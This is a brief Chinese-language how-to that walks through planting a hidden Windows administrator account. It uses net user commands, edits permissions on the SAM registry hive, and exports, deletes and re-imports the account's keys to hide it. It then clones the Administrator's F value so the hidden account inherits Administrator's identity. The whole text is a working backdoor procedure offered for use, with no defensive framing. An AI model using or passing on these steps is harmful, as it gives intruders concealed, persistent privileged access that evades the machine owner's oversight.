1、创建用户a$,并加入到administrators组。
开始-运行CMD
net user a$ 1234 /add
net localgroup administrators a$ /add
2、修改的注册表
开始-regedit
HKEY_LOCAL_MACHINE\SAM\SAM,右击-〉权限-〉administrators完全控制,F5刷新
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names,导出a$,以及导出a$对应的00000xxx分支
3、删除a$
开始-运行CMD
net user a$ /del
4、选中刚才导出的两个注册表文件,右击-〉合并在“计算机管理”和“net user”均找不到a$了
5、让系统误认为a$和administrator是同一个用户
注册表中找到administrator对应的00000xxx,双击F项,全选,复制
注册表中找到a$对应的00000xxx,双击F项,全选,粘贴
